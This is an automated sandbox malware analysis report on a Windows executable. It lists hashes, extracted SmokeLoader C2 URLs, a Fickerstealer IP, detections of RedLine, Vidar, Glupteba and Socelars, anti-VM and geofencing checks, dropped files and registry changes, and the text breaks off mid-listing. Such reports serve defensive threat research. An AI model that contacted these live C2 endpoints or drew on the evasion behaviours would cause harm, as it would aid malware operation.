Analysis
-
max time kernel
114s -
max time network
152s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
20-07-2021 03:22
Static task
static1
Behavioral task
behavioral1
Sample
88A990A868EADA802839185B6F05C541.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
88A990A868EADA802839185B6F05C541.exe
Resource
win10v20210408
General
-
Target
88A990A868EADA802839185B6F05C541.exe
-
Size
3.2MB
-
MD5
88a990a868eada802839185b6f05c541
-
SHA1
499be12d4fe4f30e672601b1ccbfc4f014a8bca8
-
SHA256
474a473bf46fdbfb5a9344937674c1455d764e74c2cd8892da7d59f68ffadd5c
-
SHA512
7bd11e52a079da6584669707617a433a9f233a7300057d4751872ab202dc665b9c8429df7a641951ef04f51af74fe09e5ac6be49aa7fe2aedb235409e0243cad
Malware Config
Extracted
smokeloader
2020
http://conceitosseg.com/upload/
http://integrasidata.com/upload/
http://ozentekstil.com/upload/
http://finbelportal.com/upload/
http://telanganadigital.com/upload/
Extracted
fickerstealer
37.0.8.225:80
Extracted
metasploit
windows/single_exec
Signatures
-
Fickerstealer
Ficker is an infostealer written in Rust and ASM.
-
Glupteba Payload 2 IoCs
resource yara_rule behavioral2/memory/6024-480-0x00000000015D0000-0x0000000001EF6000-memory.dmp family_glupteba behavioral2/memory/6024-481-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4820 4716 rUNdlL32.eXe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5216 3016 rUNdlL32.eXe 157 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4912 3016 rUNdlL32.eXe 157 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 7 IoCs
resource yara_rule behavioral2/files/0x000100000001ac00-323.dat family_redline behavioral2/files/0x000100000001ac00-319.dat family_redline behavioral2/memory/4836-437-0x0000000000417E1E-mapping.dmp family_redline behavioral2/memory/2312-439-0x0000000000417E26-mapping.dmp family_redline behavioral2/memory/5272-453-0x0000000000417DEE-mapping.dmp family_redline behavioral2/memory/6028-473-0x0000000000417DEA-mapping.dmp family_redline behavioral2/memory/5352-614-0x0000000000417E22-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral2/files/0x00020000000197e8-141.dat family_socelars behavioral2/files/0x00020000000197e8-140.dat family_socelars -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
resource yara_rule behavioral2/memory/5404-592-0x000000000046B76D-mapping.dmp family_vidar -
Downloads MZ/PE file
-
Executes dropped EXE 28 IoCs
pid Process 3916 Files.exe 2112 File.exe 4168 Folder.exe 4212 KRSetp.exe 4248 Info.exe 4292 jg3_3uag.exe 4316 Install.exe 4396 pub2.exe 4516 Folder.exe 5480 bz7NidxgK752OQuKGpXs5iwz.exe 5512 WGbVcIBAsQcSiFMmqHFE8wq9.exe 5540 ssFqA60ovSmfzaH0YHkP__Bp.exe 5588 7C0sF6DCguOrqWtIfI8Y5Fw2.exe 5612 PqvGsfeLzoFewvfPJpfwL5el.exe 5648 seBCf4ZlNLZ9PaeYpIEYTmZ6.exe 5660 Qme2sFpaAjRiZgbn9sDjN91x.exe 6000 efZJSzwJLtDVOkr6nI6JeUNG.exe 6020 lmaJgmjUdnJRcF8me39B6cpp.exe 6024 WqU8afrqJ_wEl7LC18l5PV1i.exe 6036 v9rmvwLlLvA5U9ymdLMEUTJW.exe 6048 RO3QNbYnukhvSgCvLm09jbuj.exe 6092 wcvBkjEvJwuMtZyCqWUE6pBz.exe 6080 sY07eraSUn_mxBuBdNDCn059.exe 6120 JUaHo_m_PyvcqrF6QEipVMNQ.exe 6068 TlTunaSTsvMnMn1ZPIfAsKr9.exe 6012 w9dso34OfUUaZ8ZCNNnLh8kf.exe 5132 EmTzd0lcH7R71dNGqBDqz17C.exe 3208 9eTvqwvLIlaadnIeHwiSKWLU.exe -
resource yara_rule behavioral2/files/0x00020000000152e2-136.dat vmprotect behavioral2/files/0x00020000000152e2-135.dat vmprotect behavioral2/memory/4292-143-0x0000000000400000-0x00000000005DB000-memory.dmp vmprotect behavioral2/files/0x000100000001ac24-375.dat vmprotect behavioral2/files/0x000100000001ac24-374.dat vmprotect -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9eTvqwvLIlaadnIeHwiSKWLU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9eTvqwvLIlaadnIeHwiSKWLU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sY07eraSUn_mxBuBdNDCn059.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sY07eraSUn_mxBuBdNDCn059.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation 88A990A868EADA802839185B6F05C541.exe Key value queried \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation Files.exe -
Loads dropped DLL 2 IoCs
pid Process 4876 rundll32.exe 4396 pub2.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x000100000001ac25-376.dat themida behavioral2/files/0x000100000001ac2e-385.dat themida behavioral2/files/0x000100000001ac25-377.dat themida -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg3_3uag.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sY07eraSUn_mxBuBdNDCn059.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 9eTvqwvLIlaadnIeHwiSKWLU.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 191 ipinfo.io 18 ipinfo.io 19 ipinfo.io 63 ip-api.com 174 api.ipify.org 189 ipinfo.io -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 91DF5CF3051F0205 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 6080 sY07eraSUn_mxBuBdNDCn059.exe 3208 9eTvqwvLIlaadnIeHwiSKWLU.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2036 set thread context of 4964 2036 svchost.exe 95 -
autoit_exe 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000200000001ab51-122.dat autoit_exe behavioral2/files/0x000200000001ab51-123.dat autoit_exe -
Drops file in Program Files directory 7 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\EverestSoftrade\TonerRecover\Toner-Recover.exe Qme2sFpaAjRiZgbn9sDjN91x.exe File opened for modification C:\Program Files (x86)\EverestSoftrade\TonerRecover\adj.reg Qme2sFpaAjRiZgbn9sDjN91x.exe File opened for modification C:\Program Files (x86)\EverestSoftrade\TonerRecover\adj2.reg Qme2sFpaAjRiZgbn9sDjN91x.exe File opened for modification C:\Program Files (x86)\EverestSoftrade\TonerRecover\log.bat Qme2sFpaAjRiZgbn9sDjN91x.exe File opened for modification C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe Qme2sFpaAjRiZgbn9sDjN91x.exe File opened for modification C:\Program Files (x86)\EverestSoftrade\TonerRecover\Uninstall.exe Qme2sFpaAjRiZgbn9sDjN91x.exe File created C:\Program Files (x86)\EverestSoftrade\TonerRecover\Uninstall.ini Qme2sFpaAjRiZgbn9sDjN91x.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 11 IoCs
pid pid_target Process procid_target 4776 6120 WerFault.exe 118 5656 6120 WerFault.exe 118 4192 6120 WerFault.exe 118 5480 6120 WerFault.exe 118 5576 6120 WerFault.exe 118 5408 6404 WerFault.exe 195 1928 6580 WerFault.exe 211 4324 6580 WerFault.exe 211 6956 6580 WerFault.exe 211 4700 6580 WerFault.exe 211 5288 6580 WerFault.exe 211 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub2.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe -
Kills process with taskkill 2 IoCs
pid Process 6364 taskkill.exe 4984 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies data under HKEY_USERS 13 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software svchost.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{69RG4ZP0-857P-S13A-ZW93-6DTG316B7ZWC} svchost.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\NextBrowserDataLogTime = 30c5ea1e5a7dd701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "{42B8813D-7B82-4C11-9D56-BD2579B207ED}" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 1d24df8b702cd701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = 1d24df8b702cd701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\"" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListInPrivateBrowsingAllowed = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID svchost.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 1d24df8b702cd701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry MicrosoftEdge.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{20EP1MI0-142C-L17D-YD26-2GCP283P3KMT}\1 = "5276" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\SharedCookie_MRACMigrationDone = "1" MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance Process not Found Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "5" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{45AC2TN3-666M-M32E-TO40-1MIP137D5TOZ}\1 = "5344" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 0a4526b3277dd701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 05398aee277dd701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3" MicrosoftEdge.exe Set value (int) 